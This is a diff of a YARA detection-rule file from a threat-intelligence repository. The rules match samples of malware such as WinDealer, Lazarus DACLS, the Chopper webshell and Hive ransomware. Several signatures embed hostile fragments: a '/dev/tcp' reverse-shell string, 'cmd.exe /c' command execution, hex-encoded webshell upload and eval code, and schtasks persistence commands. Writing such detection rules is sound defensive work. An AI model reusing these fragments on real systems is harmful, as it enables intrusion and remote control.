-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-10-30/WinDealer/MAL_WinDealer_Oct_2021_2.yara#L1-L19"
+		id = "8ede3aa9-9788-52a5-91a7-bb160daad5ba"
+		date = "2021-02-27"
+		modified = "2021-03-01"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-02-28/Molerats/APT_Molerats_Feb_2021_1.yar#L1-L23"
 		license_url = "N/A"
-		logic_hash = "c2fb5697dcdb34e0fb3e2dbd2df05748eddc2796c253e90503372eb73c475fab"
+		logic_hash = "fbd98f088019434f736107dfe62a307e2c57d0288d68f3133a13de59bf318aea"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "0c365d9730a10f1a3680d24214682f79f88aa2a2a602d3d80ef4c1712210ab07"
-		hash2 = "2eef273af0c768b514db6159d7772054d27a6fa8bc3d862df74de75741dbfb9c"
-		tlp = "white"
-		adversary = "LuoYu"
+		hash1 = "0a55551ade55705d4be6e946ab58a26d7cf8087558894af8799931b09d38f3bc"
+		hash2 = "c9d7b5d06cd8ab1a01bf0c5bf41ef2a388e41b4c66b1728494f86ed255a95d48"
 
 	strings:
-		$s1 = { 81 ec f0 03 00 00 53 55 8b d9 56 8d 44 24 0c 57 8d 4c 24 18 50 51 c7 44 24 18 f4 01 00 00 ff 15 0c [2] 10 85 c0 0f 85 ?? 01 00 00 68 [3] 10  }
-		$s2 = { 81 ec 24 03 00 00 53 56 8d 44 24 18 57 50 68 03 01 00 00 6a 00 68 [2] 03 10 68 01 00 00 80 c7 44 24 20 00 00 00 00 ff 15 10 [2] 10 85 c0 0f 85 ?? 01 00 00 8d 4c 24 0c 8d 54 24 20 51 52 8b 1d 00 [2] 10 50 68 3f 01 0f 00 50 50 50 8b 44 24 38 68 [2] 03 10 50 ff d3 85 c0 0f 85 ?? 01 00 00 8d 4c 24 0c 8d 54 24 10 51 52 50 68 3f 01 0f 00 50 50 50 8b 44 24 3c 68 [2] 03 10 50 ff d3 85 c0 0f 85 ?? 01 00 00 bf [2] 03 10 83 c9 ff f2 ae f7 d1 2b f9 8d ?? 24 }
-		$s3 = "%s\\%s\\V5_History.dat" wide
-		$s4 = { 8b 8c 24 2c 02 00 00 8b 94 24 28 02 00 00 55 57 51 52 8d 44 24 24 53 50 89 74 24 2c e8 05 fb ff ff b9 41 00 00 00 33 c0 8d bc 24 34 01 00 00 83 c4 18 f3 ab 8d 8c 24 1c 01 00 00 51 68 04 01 00 00 ff 15 [2] 03 10 b9 41 00 00 00 33 c0 8d 7c 24 18 50 f3 ab [3] 01 }
-		$s5 = { 56 6a 10 e8 [3] 00 8b f0 85 f6 74 3a 8b 4c 24 0c 8d 46 04 85 c9 c7 06 [3] 10 c7 00 00 00 00 00 50 74 11 8b 44 24 0c 50 e8 [3] 00 89 46 08 8b c6 5e c3 8b 4c 24 0c 51 e8 [3] 00 89 46 08 8b c6 5e c3 33 }
+		$seq1 = { 55 8b ec 81 c4 60 fc ff ff 53 33 d2 89 95 60 fc ff ff 89 45 fc 33 c0 55 68 [1-3] 00 64 ff 30 64 89 20 8b 45 fc 83 78 44 00 0f 85 5d 01 00 00 b2 01 a1 [2] 44 00 e8 [3] ff 8b 55 fc 89 42 44 8b 45 fc 83 c0 48 e8 [3] ff 8d 85 ec fe ff ff 50 6a 40 e8 [3] ff 48 85 c0 0f 8c 18 01 00 00 40 89 45 f0 8d 85 ec fe ff ff 89 45 ec 8b 45 ec 8b 00 e8 35 ?? f5 ff 84 c0 0f 84 ec 00 00 00 8d 45 f4 50 68 19 00 02 00 6a 00 6a 00 8b 45 ec 0f b7 00 89 85 64 fc ff ff c6 85 68 fc ff ff 00 8d 8d 64 fc ff ff ba [3] 00 8d 85 6c fc ff ff e8 [3] ff 50 68 02 00 00 80 e8 [3] ff 85 c0 0f 85 a3 00 00 00 33 c0 55 68 [3] 00 64 ff 30 64 89 20 c7 45 f8 00 02 00 00 8d 45 f8 50 8d 85 ec fc ff ff 50 6a 00 6a 00 68 [3] 00 8b 45 f4 50 e8 [3] ff 85 c0 75 4f 8d 85 60 fc ff ff 8d 95 ec fc ff ff b9 00 01 00 00 e8 [3] ff 8b 95 60 fc ff ff 8b 45 ec 8b 08 8b 45 fc 8b 40 44 8b 18 ff 53 40 8b 45 ec 8b 00 8b 55 fc 3b 42 4c 75 16 8b 45 fc 83 c0 48 8d 95 ec fc ff ff b9 00 01 00 00 e8 [3] ff 33 c0 5a 59 59 64 89 10 68 [3] 00 8b 45 f4 50 e8 [3] ff }
+		$seq2 = { 55 8b ec 81 c4 e4 fd ff ff 53 8b da 89 45 fc 8b 45 fc e8 [2] ff ff 33 c0 55 68 [2] 40 00 64 ff 30 64 89 20 83 7d fc 00 75 15 68 05 01 00 00 8d 85 e6 fd ff ff 50 6a 00 e8 [2] ff ff eb 1a 8b 45 fc e8 [2] ff ff 8b c8 8d 85 e6 fd ff ff ba 05 01 00 00 e8 da f7 ff ff 66 83 bd e6 fd ff ff 00 0f 84 a7 01 00 00 33 c0 89 45 f8 8d 45 f4 50 68 19 00 0f 00 6a 00 68 [2] 40 00 68 01 00 00 80 e8 [2] ff ff 85 c0 0f 84 9a 00 00 00 8d 45 f4 50 68 19 00 0f 00 6a 00 68 [2] 40 00 68 02 00 00 80 e8 2b 5e ff ff 85 c0 74 7c 8d 45 f4 50 68 19 00 0f 00 6a 00 68 70 f6 40 00 68 01 00 00 80 e8 0d 5e ff ff 85 c0 74 5e 8d 45 f4 50 68 19 00 0f 00 6a 00 68 70 f6 40 00 68 02 00 00 80 e8 [2] ff ff 85 c0 74 40 8d 45 f4 50 68 19 00 0f 00 6a 00 68 [2] 40 00 68 01 00 00 80 e8 [2] ff ff 85 c0 74 22 8d 45 f4 50 68 19 00 0f 00 6a 00 68 [2] 40 00 68 01 00 00 80 e8 [2] ff ff 85 c0 0f 85 e6 00 00 00 33 c0 55 68 [2] 40 00 64 ff 30 64 89 20 8d 85 e6 fd ff ff ba 05 01 00 00 e8 c9 fc ff ff 8d 45 f0 50 6a 00 6a 00 6a 00 8d 85 e6 fd ff ff 50 8b 45 f4 50 e8 [2] ff ff 85 c0 75 33 8b 45 f0 e8 [2] ff ff 89 45 f8 8d 45 f0 50 8b 45 f8 50 6a 00 6a 00 8d 85 e6 fd ff ff 50 8b 45 f4 50 e8 [2] ff ff 8b c3 8b 55 f8 e8 [2] ff ff eb 4b 8d 45 f0 50 6a 00 6a 00 6a 00 68 [2] 40 00 8b 45 f4 50 e8 [2] ff ff 85 c0 75 2f 8b 45 f0 e8 [2] ff ff 89 45 f8 8d 45 f0 50 8b 45 f8 50 6a 00 6a 00 68 [2] 40 00 8b 45 f4 50 e8 [2] ff ff 8b c3 8b 55 f8 e8 [2] ff ff 33 c0 5a 59 59 64 89 10 68 [2] 40 00 83 7d f8 00 74 08 8b 45 f8 e8 [2] ff ff 8b 45 f4 50 e8 [2] ff ff }
+		$seq3 = { d1 f8 79 03 83 d0 00 03 45 80 89 45 d0 8b 45 a4 8b 80 e4 02 00 00 8b 40 10 01 45 d0 8b 45 a4 8b 80 e4 02 00 00 8b 40 04 29 45 d0 8b 75 8c 2b 75 d4 83 ee 02 8b 45 a4 8b 80 e4 02 00 00 2b 70 08 8b 45 a4 8b 80 e4 02 00 00 2b 70 0c 89 75 8c 6a 00 56 8b 45 d0 50 8b 45 ec e8 [2] fb ff 50 57 8b 85 68 ff ff ff 50 e8 [2] fc ff 84 db 0f 84 0d 03 00 00 a1 [3] 00 8b 00 e8 [2] 09 00 50 8b 45 b4 50 6a 23 e8 [3] ff 89 45 d8 8b 45 d8 01 45 90 83 45 94 0f 83 45 90 05 8b 45 f0 8b 40 08 8b 50 74 }
+		$s1 = "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x" fullword wide
+		$s2 = { 45 00 72 00 72 00 6f 00 72 00 20 00 63 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 69 00 6e 00 67 00 20 00 74 00 6f 00 20 00 73 00 65 00 72 00 76 00 65 00 72 00 3a 00 20 00 25 00 73 }
+		$s3 = { 45 00 72 00 72 00 6f 00 72 00 20 00 6f 00 70 00 65 00 6e 00 69 00 6e 00 67 00 20 00 72 00 65 00 71 00 75 00 65 00 73 00 74 00 3a 00 20 00 28 00 25 00 64 00 29 00 20 00 25 00 73 }
+		$s4 = { 43 00 61 00 6e 00 6e 00 6f 00 74 00 20 00 6f 00 70 00 65 00 6e 00 20 00 66 00 69 00 6c 00 65 00 20 00 22 00 25 00 73 00 22 00 2e 00 20 00 25 00 73 }
+		$s5 = { 43 00 61 00 6e 00 6e 00 6f 00 74 00 20 00 6f 00 70 00 65 00 6e 00 20 00 63 00 6c 00 69 00 70 00 62 00 6f 00 61 00 72 00 64 00 3a 00 20 00 25 00 73 }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 80KB and 4 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 500KB and 2 of ( $seq* ) and 3 of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_Windealer_Oct_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_UNC2452_Webshell_Chopper_Mar_2021_1 : FILE
 {
 	meta:
-		description = "Detect WinDealer implant"
+		description = "Detect exploit listener in the exchange configuration for Webshell Chopper used by UNC2452 group"
 		author = "Arkbird_SOLG"
-		id = "7ffece8a-b56a-5893-a135-3001c0327f66"
-		date = "2021-10-30"
-		modified = "2021-10-31"
-		reference = "https://blogs.jpcert.or.jp/en/2021/10/windealer.html"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-10-30/WinDealer/MAL_WinDealer_Oct_2021_1.yara#L1-L19"
+		id = "174af8e1-0df0-5ad7-ac7d-a208f64cb765"
+		date = "2021-03-07"
+		modified = "2021-03-07"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-07/UNC2452/APT_UNC2452_Webshell_Chopper_Mar_2021_1.yar#L1-L26"
 		license_url = "N/A"
-		logic_hash = "b6211274a0ffa55723d3c34763540278197507b4bd4b853249e16501a3aa5acb"
+		logic_hash = "77bd7e5c10aa9cf2b407b37a76954b4eed163e36653e1fb3cde5de853f824cf0"
 		score = 75
-		quality = 71
+		quality = 73
 		tags = "FILE"
-		hash1 = "1e9fc7f32bd5522dd0222932eb9f1d8bd0a2e132c7b46cfcc622ad97831e6128"
-		hash2 = "b9f526eea625eec1ddab25a0fc9bd847f37c9189750499c446471b7a52204d5a"
-		tlp = "white"
-		adversary = "LuoYu"
 
 	strings:
-		$s1 = { 8b ec 81 ec 64 03 00 00 53 56 33 db 6a 64 8d 45 9c 53 50 e8 [2] 00 00 be 00 01 00 00 8d 85 9c fc ff ff 56 53 50 e8 [2] 00 00 56 8d 85 9c fd ff ff 53 50 e8 [2] 00 00 56 8d 85 9c fe ff ff 53 50 e8 [2] 00 00 83 c4 30 8d 45 9c 6a 64 50 ff 15 [2] 41 00 8d 85 9c fe ff ff 50 8d 85 9c fd ff ff 50 8d 85 9c fc ff ff 50 ff 75 9c e8 [2] ff ff 83 c4 10 38 9d 9c fe ff ff 5e 5b 75 20 8d 85 9c fe ff ff 50 8d 85 9c fd ff ff 50 8d 85 9c fc ff ff 50 ff 75 9c e8 [2] ff ff 83 c4 10 8d 85 9c fe ff ff 50 8d 85 9c fd ff ff 50 8d 85 9c fc ff ff 50 68 [2] 41 00 ff 75 08 ff 15 [2] 41 00 83 c4 14 6a }
-		$s2 = { 8b ec b8 40 1c 00 00 e8 [2] 00 00 56 57 33 ff 68 [2] 41 00 89 7d f8 ff 15 [2] 41 00 8b f0 6a 32 8d 45 c0 57 50 e8 [2] 00 00 83 c4 10 3b f7 74 1c 6a 5c 56 ff 15 [2] 41 00 59 3b c7 59 74 0d 40 50 8d 45 c0 50 e8 [2] 00 00 59 59 be 00 04 00 00 8d 85 c0 f7 ff ff 56 57 50 89 75 fc e8 [2] 00 00 8d 45 fc 50 8d 85 c0 f7 ff ff 50 e8 fb fd ff ff 83 c4 14 39 7d fc 75 24 56 8d 85 c0 f7 ff ff 57 50 89 75 fc e8 [2] 00 00 8d 45 fc 50 8d 85 c0 f7 ff ff 50 e8 ?? fc ff ff 83 c4 14 56 8d 85 c0 fb ff ff 57 50 e8 [2] 00 00 8d 85 c0 fb ff ff 50 e8 [2] 00 00 8d 85 c0 fb ff ff 50 e8 [2] 00 00 83 c4 14 83 7d fc 0a 7e 3e 83 f8 0a 7e 6d 8d 45 c0 50 8d 85 c0 fb ff ff 50 8d 85 c0 f7 ff ff 50 8d 85 c0 e3 ff ff 68 [2] 41 00 50 ff 15 [2] 41 00 50 8d 85 c0 e3 ff ff 50 e8 4d fd ff ff 83 c4 1c 89 45 f8 eb 5c 83 f8 0a 7e 2f 8d 45 c0 50 8d 85 c0 fb ff ff 50 8d 85 c0 e3 ff ff 68 [2] 41 00 50 ff 15 [2] 41 00 50 8d 85 c0 e3 ff ff 50 e8 16 fd ff ff 83 c4 18 eb c7 6a 43 8d 45 f4 68 [2] 41 00 50 ff 15 [2] 41 00 83 c4 0c 8d 45 f8 57 57 57 57 50 57 8d 45 f4 57 50 ff 15 [2] 41 00 8b 45 f8 }
-		$s3 = { 53 59 53 54 45 4d 5c 43 75 72 72 65 6e 74 43 6f 6e 74 72 6f 6c 53 65 74 5c 43 6f 6e 74 72 6f 6c 5c 4e 65 74 77 6f 72 6b 5c 7b 34 44 33 36 45 39 37 32 2d 45 33 32 35 2d 31 31 43 45 2d 42 46 43 31 2d 30 38 30 30 32 42 45 31 30 33 31 38 7d 5c 25 73 5c 43 6f 6e 6e 65 63 74 69 6f 6e }
-		$s4 = { 6d 61 63 3a 20 25 30 32 58 3a 25 30 32 58 3a 25 30 32 58 3a 25 30 32 58 3a 25 30 32 58 3a 25 30 32 58 }
-		$s5 = { 8b d8 59 85 db 59 74 57 56 e8 [2] 00 00 03 d8 53 ff 15 [2] 41 00 6a 00 50 e8 [2] ff ff 6a 64 8d 45 9c 6a 00 50 e8 [2] 00 00 83 c4 1c 8d 45 9c 68 [2] 41 00 68 [2] 41 00 50 ff 15 [2] 41 00 66 8b 8f d2 07 00 00 51 8a 8f d0 07 00 00 51 50 8d 45 9c 50 e8 ?? f1 ff ff 83 c4 1c 5f 5e 33 c0 5b c9 c3 55 }
+		$l1 = { 20 68 74 74 70 3a 2f 2f ?? 2f 3c 73 63 72 69 70 74 20 4c 61 6e 67 75 61 67 65 3d 22 63 23 22 20 72 75 6e 61 74 3d 22 73 65 72 76 65 72 22 3e 76 6f 69 64 20 50 61 67 65 5f 4c 6f 61 64 28 6f 62 6a 65 63 74 20 73 65 6e 64 65 72 2c 20 45 76 65 6e 74 41 72 67 73 20 65 29 7b 69 66 20 28 52 65 71 75 65 73 74 2e 46 69 6c 65 73 2e 43 6f 75 6e 74 21 3d 30 29 20 7b 20 52 65 71 75 65 73 74 2e 46 69 6c 65 73 5b 30 5d 2e 53 61 76 65 41 73 28 53 65 72 76 65 72 2e 4d 61 70 50 61 74 68 28 22 [5-14] 22 29 29 3b 7d 7d 3c 2f 73 63 72 69 70 74 3e }
+		$l2 = { 68 74 74 70 3a 2f 2f ?? 2f 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 53 63 72 69 70 74 22 20 72 75 6e 61 74 3d 22 73 65 72 76 65 72 22 3e 66 75 6e 63 74 69 6f 6e 20 50 61 67 65 5f 4c 6f 61 64 28 29 7b 65 76 61 6c 28 [-] 2c 22 75 6e 73 61 66 65 22 29 3b 7d 3c 2f 73 63 72 69 70 74 3e }
+		$c1 = { 5c 4f 41 42 20 28 44 65 66 61 75 6c 74 20 57 65 62 20 53 69 74 65 29 }
+		$c2 = "ExternalUrl" fullword ascii
+		$c3 = { 49 49 53 3a 2f 2f [10-30] 2f 57 33 53 56 43 2f [1-3] 2f 52 4f 4f 54 2f 4f 41 42 }
+		$c4 = "FrontEnd\\HttpProxy\\OAB" fullword ascii
+		$c5 = "/Configuration/Schema/ms-Exch-OAB-Virtual-Directory" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 80KB and 4 of ( $s* )
+		filesize > 1KB and 1 of ( $l* ) and 3 of ( $c* )
 }
 rule ARKBIRD_SOLG_Ran_Mem_Ragnarlocker_Nov_2020_1 : FILE
 {
@@ -148336,345 +149187,310 @@ rule ARKBIRD_SOLG_Ran_Cert_Ragnarlocker_Nov_2020_1 : FILE
 	condition:
 		uint16( 0 ) == 0x5a4d and filesize > 5000KB and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "GlobalSign" and pe.signatures [ i ] . serial == "68:65:29:4f:67:f0:c3:bb:2e:19:1f:75" ) and $vmp0 in ( 0x100 .. 0x300 ) and $vmp1 in ( 0x100 .. 0x300 )
 }
-rule ARKBIRD_SOLG_APT_MAL_NK_Lazarus_Dacls_June_2020_1 : FILE
+rule ARKBIRD_SOLG_MAL_Unknown_PE_Jul_2021_1 : FILE
 {
 	meta:
-		description = "Detect DACLS malware used by APT Lazarus"
+		description = "Detect unknown TA that focus russian people"
 		author = "Arkbird_SOLG"
-		id = "fb85b83a-4367-5f1d-be06-8a8e906b8df7"
-		date = "2020-06-11"
-		modified = "2020-06-12"
-		reference = "https://twitter.com/batrix20/status/1270924079826997248"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-12/Lazarus/Lazarus_June_2020_1.yar#L3-L26"
+		id = "228e194c-84d9-562a-8811-326c5efeafae"
+		date = "2020-07-14"
+		modified = "2021-07-14"
+		reference = "https://twitter.com/ShadowChasing1/status/1415292150258880513"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-14/MAL_Unknown_PE_Jul_2021_1.yara#L1-L19"
 		license_url = "N/A"
-		logic_hash = "ed3e4a7a0490c5e8854d4e1bc8a223658ab9657a03c1b237af1056293a51611b"
+		logic_hash = "9c61d2e29315bea0cdaf45b6dc48d35b8cc2d85de84afbb3a213f095a555af71"
 		score = 75
-		quality = 48
+		quality = 73
 		tags = "FILE"
-		hash1 = "2dd57d67e486d6855df8235c15c9657f39e488ff5275d0ce0fcec7fc8566c64b"
+		hash1 = "ef80365cdbeb46fa208e98ca2f73b7d3d2bde10ea6c3f7cc22d4bbf39d921524"
+		tlp = "white"
+		adversary = "-"
 
 	strings:
-		$s1 = "bash -i > /dev/tcp/" fullword ascii
-		$s2 = "__mh_execute_header" fullword ascii
-		$s3 = "/bin/bash -c \"" fullword ascii
-		$s4 = "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" fullword ascii
-		$s5 = "@_gethostbyname" fullword ascii
-		$s6 = "@_gethostname" fullword ascii
-		$s7 = "radr://5614542" fullword ascii
-		$s8 = "sh -c \"" fullword ascii
-		$s9 = "content-type: multipart/form-data" fullword ascii
-		$s10 = "@___stack_chk_fail" fullword ascii
-		$s11 = "/usr/lib/libSystem.B.dylib" fullword ascii
-		$s12 = "@dyld_stub_binder" fullword ascii
+		$s1 = { 73 00 63 00 68 00 74 00 61 00 73 00 6b 00 73 00 20 00 2f 00 43 00 52 00 45 00 41 00 54 00 45 00 20 00 2f 00 53 00 43 00 20 00 4f 00 4e 00 43 00 45 00 20 00 2f 00 54 00 4e 00 20 00 25 00 73 00 20 00 2f 00 54 00 52 00 20 00 25 00 73 00 20 00 2f 00 52 00 49 00 20 00 31 00 20 00 2f 00 53 00 54 00 20 00 25 00 30 00 32 00 64 00 3a 00 25 00 30 00 32 00 64 00 20 00 2f 00 45 00 54 00 20 00 25 00 30 00 32 00 64 00 3a 00 25 00 30 00 32 00 64 00 20 00 2f 00 46 }
+		$s2 = { 73 00 63 00 68 00 74 00 61 00 73 00 6b 00 73 00 20 00 2f 00 45 00 6e 00 64 00 20 00 2f 00 54 00 4e 00 20 00 25 00 73 }
+		$s3 = { 73 00 63 00 68 00 74 00 61 00 73 00 6b 00 73 00 20 00 2f 00 44 00 65 00 6c 00 65 00 74 00 65 00 20 00 2f 00 54 00 4e 00 20 00 25 00 73 00 20 00 2f 00 46 00 20 00 3c 00 20 00 25 00 73 }
+		$s4 = "6ad5e187ae3e8911c420434551678df2.txt" fullword wide
+		$s5 = { 55 52 4c 44 6f 77 6e 6c 6f 61 64 65 72 }
+		$s6 = { 64 6c 6c 00 4d 79 45 78 70 6f 72 74 }
 
 	condition:
-		uint16( 0 ) == 0xfacf and filesize < 200KB and 10 of them
+		uint16( 0 ) == 0x5a4d and filesize > 8KB and 5 of ( $s* )
 }
-
-rule ARKBIRD_SOLG_APT_MAL_NK_Lazarus_Nukesped_June_2020_1 : FILE
+rule ARKBIRD_SOLG_ATM_Dispcashbr_May_2021_1 : FILE
 {
 	meta:
-		description = "Detect NukeSped malware used by APT Lazarus"
+		description = "Detect the DispCashBR ATM malware"
 		author = "Arkbird_SOLG"
-		id = "7a5b27df-43bd-544d-8d0f-72e58ce3064c"
-		date = "2020-06-11"
-		modified = "2020-06-12"
-		reference = "https://twitter.com/batrix20/status/1270924079826997248"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-12/Lazarus/Lazarus_June_2020_1.yar#L28-L54"
+		id = "629261d8-242c-580d-aa4d-4b313c77edef"
+		date = "2020-05-14"
+		modified = "2021-05-14"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-14/DispCashBR/ATM_DispCashBR_May_2021_1.yara#L1-L18"
 		license_url = "N/A"
-		logic_hash = "b1332eb255f8ae9ae6a68ef8ef86d9f5472584cae8161c27186e341990df7eae"
+		logic_hash = "26f641a266c1f187d834a05b327c13ddee93747e182a5458e4ec3cb1f23f5f47"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "90ea1c7806e2d638f4a942b36a533a1da61adedd05a6d80ea1e09527cf2d839b"
+		hash1 = "432f732a4ecbb86cb3dedbfa881f2733d20cbcc5958ead52823bf0967c133175"
+		hash2 = "7cea6510434f2c8f28c9dbada7973449bb1f844cfe589cdc103c9946c2673036"
+		tlp = "White"
+		adversary = "-"
 
 	strings:
-		$s1 = "%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X" fullword wide
-		$s2 = "<htr<jtb<lt6<tt&<wt" fullword ascii
-		$s3 = "Content-Disposition: form-data; name=\"file\"; filename=\"%s\"" fullword ascii
-		$s4 = "Content-Type: multipart/form-data; boundary=" fullword wide
-		$s5 = "POST" fullword ascii
-		$s6 = "Content-Type: octet-stream" fullword ascii
-		$s7 = "CONOUT$" fullword ascii
-		$s8 = "cmd.exe /c" fullword ascii
-		$s9 = "2>&1" fullword ascii
-		$s10 = "WINHTTP.dll" fullword ascii
-		$s11 = "WinHttpSendRequest" fullword wide
-		$s12 = "ObtainUserAgentString" fullword ascii
-		$s13 = "WS2_32.dll" fullword ascii
-		$s14 = "WinHttpReceiveResponse" fullword ascii
-		$s15 = "GetLogicalDrives" fullword ascii
+		$seq1 = { c7 45 cc 00 00 00 00 c7 04 24 68 5d 40 00 e8 40 0e 00 00 8b 85 a0 fd ff ff 8b 40 0a 8b 40 03 89 44 24 04 c7 04 24 89 5d 40 00 e8 0c 0e 00 00 c7 04 24 a4 5d 40 00 e8 18 0e 00 00 8b 85 a0 fd ff ff 8b 40 0a 8b 40 03 01 45 cc c7 04 24 d0 07 00 00 e8 7d 0e 00 00 83 ec 04 8b 85 a0 fd ff ff 8d 48 0a 0f b7 85 be fd ff ff 0f b7 c0 8d 95 98 fd ff ff 89 54 24 10 c7 44 24 0c 00 00 00 00 89 4c 24 08 c7 44 24 04 2e 01 00 00 89 04 24 e8 75 05 00 00 83 ec 14 89 45 e8 8b 45 e8 83 c0 38 83 }
+		$seq2 = { 0f b7 85 be fd ff ff 0f b7 c0 8b 55 e4 89 54 24 08 c7 44 24 04 06 00 00 00 89 04 24 e8 7e 17 00 00 83 ec 0c 0f b7 85 be fd ff ff 0f b7 c0 8d 95 b8 fd ff ff 89 54 24 08 c7 44 24 04 00 00 00 00 89 04 24 e8 5f 17 00 00 83 ec 0c 0f b7 85 be fd ff ff 0f b7 c0 8d 95 26 fd ff ff 89 54 24 10 c7 44 24 0c 00 00 00 00 c7 44 24 08 00 00 00 00 c7 44 24 04 2e 01 00 00 89 04 24 e8 f8 16 00 00 83 ec 14 89 45 e0 8d 85 ac fd ff ff 89 44 24 08 c7 44 24 04 03 00 00 00 c7 04 24 04 00 00 00 e8 dc 16 00 00 83 ec 0c 8b 45 e0 83 c0 38 83 f8 }
+		$seq3 = { 8b 85 a8 fd ff ff 8b 50 14 8b 85 a8 fd ff ff 8b 40 10 0f af c2 89 45 d8 8b 45 d8 89 44 24 04 c7 04 24 04 5b 40 00 e8 aa 12 00 00 8b 85 a4 fd ff ff 0f b7 40 04 0f b7 c0 89 44 24 04 c7 04 24 24 5b 40 00 e8 8d 12 00 00 8b 85 a8 fd ff ff 8b 50 18 8b 85 a8 fd ff ff 8b 40 1c 0f af c2 89 45 d4 c7 45 f0 00 00 00 00 8b 45 d8 89 44 24 04 c7 04 24 45 5b 40 00 e8 5b 12 00 00 83 45 f0 01 83 7d f0 01 7e e3 8b 85 a0 fd ff ff c7 40 06 01 00 00 00 0f b7 85 be fd ff ff 0f b7 c0 8d 95 26 fd ff ff 89 54 24 10 c7 44 24 0c 00 00 00 00 c7 44 24 08 00 00 00 00 c7 44 24 04 2e 01 00 00 89 04 24 e8 60 ed ff ff 89 45 d0 }
+		$seq4 = { c7 45 ec 00 00 00 00 8d 85 c4 fd ff ff 89 44 24 04 c7 04 24 03 00 02 0b e8 47 1b 00 00 83 ec 08 89 45 e8 83 7d e8 00 74 18 c7 04 24 92 50 40 00 e8 8b 23 00 00 c7 04 24 ff ff ff ff e8 8f 23 00 00 c7 04 24 aa 50 40 00 e8 8b 23 00 00 c7 04 24 f5 ff ff ff e8 ef 23 00 00 83 ec 04 c7 44 24 04 03 00 00 00 89 04 24 e8 e4 23 00 00 83 ec 08 c7 04 24 b8 0b 00 00 e8 dd 23 00 00 83 ec 04 c7 04 24 c4 50 40 00 e8 4e 23 00 00 8d 85 c4 fd ff ff 83 c0 06 89 44 24 04 c7 04 24 ed 50 40 00 e8 1d 23 00 00 8d 85 c4 fd ff ff 05 07 01 00 00 89 44 24 04 c7 04 24 03 51 40 00 e8 02 23 00 00 0f b7 85 c8 fd ff ff 0f b7 c0 89 44 24 04 c7 04 24 1a 51 40 00 e8 e8 22 00 00 0f b7 85 c6 fd ff ff 0f b7 c0 89 44 24 04 c7 04 24 2f 51 40 00 e8 ce 22 00 00 0f b7 85 c4 fd ff ff 0f b7 c0 89 44 24 04 c7 04 24 42 51 40 00 e8 b4 22 00 00 c7 04 24 54 51 40 00 e8 c0 22 00 00 8d 85 c0 fd ff ff 89 04 24 e8 46 1a 00 00 83 ec 04 8b 85 c0 fd ff ff 8d 95 be fd ff ff 89 54 24 20 c7 44 24 1c 00 00 00 00 8d 95 c4 fd ff ff 89 54 24 18 c7 44 24 14 0f 00 02 0b c7 44 24 10 00 00 00 00 c7 44 24 0c 00 00 00 00 c7 44 24 08 00 00 00 00 89 44 24 04 c7 04 24 7f 51 40 00 e8 f9 19 00 00 83 ec 24 89 45 e8 8b 45 e8 83 c0 36 83 f8 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( pe.imphash ( ) == "c8379f0eeeb3a522f1dd75aa5f1500b0" or 12 of them )
+		uint16( 0 ) == 0x5a4d and filesize > 20KB and 3 of ( $seq* )
 }
-rule ARKBIRD_SOLG_APT_Evilnum_LNK_Jul_2021_1 : FILE
+rule ARKBIRD_SOLG_RAN_ELF_Hive_Oct_2021_1 : FILE
 {
 	meta:
-		description = "Detect LNK file used by EvilNum group"
+		description = "Detect ELF version of Hive ransomware"
 		author = "Arkbird_SOLG"
-		id = "9d570c02-606a-5bff-af7a-9b5ef1e6df90"
-		date = "2020-07-13"
-		modified = "2021-07-14"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-13/EvilNum/APT_EvilNum_LNK_Jul_2021_1.yara#L1-L22"
+		id = "434cfe85-3209-5990-9c68-47ce4fafd5b8"
+		date = "2021-10-29"
+		modified = "2021-10-30"
+		reference = "https://twitter.com/ESETresearch/status/1454100591261667329"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-10-29/Hive/RAN_ELF_Hive_Oct_2021_1.yara#L1-L19"
 		license_url = "N/A"
-		logic_hash = "d20aadfce6a0246f415f94a62edbf7fd48dcdcd9756a5a8d898a5459633b9350"
-		score = 75
-		quality = 75
+		logic_hash = "47ccf3b825521986070dba92194d5937289c0335b922537ea3242c4afb2be237"
+		score = 60
+		quality = 35
 		tags = "FILE"
-		hash1 = "b60ae30ba90f852f886bb4e9aaabe910add2b70278e3a88a3b7968f644e10554"
-		hash2 = "bc203f44b48c9136786891be153311c37ce74ceb7eb540d515032c152f5eb2fb"
-		hash3 = "fefc9dbb46bc02a2bdccbf3c581d270f6341562e050e5357484ecae7e1e702f3"
